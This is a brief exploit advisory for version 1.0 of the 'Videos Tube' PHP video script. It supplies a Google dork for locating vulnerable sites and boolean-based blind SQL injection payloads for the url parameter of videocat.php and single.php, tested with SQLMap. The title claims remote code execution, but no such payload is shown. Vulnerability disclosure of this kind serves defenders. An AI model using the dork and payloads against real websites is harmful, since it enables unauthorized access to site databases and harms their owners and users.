# Exploit Title: Videos Tube SQL Injection and Remote Code Execution|
|# Google Dork: inurl:"single.php?url=" video|
|# Date: 05.05.2014|
|# Exploit Author: Mustafa ALTINKAYNAK|
|# Vendor Homepage: http://www.phpscriptlerim.com|
|# Software Link: http://demo.phpscriptlerim.com/free/videostube/|
|# Version: 1.0|
|Description (Aklama)|
|========================|
|Category, showing video on the page are two types of SQL injection.
Boolean-based blind and AND / OR time-based blind. Incoming data can be
filtered off light.|
|Vulnerability|
|========================|
|1) videocat.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMAP
Tool)|
|2) single.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMap Tool)|
--
*Mustafa ALTINKAYNAK***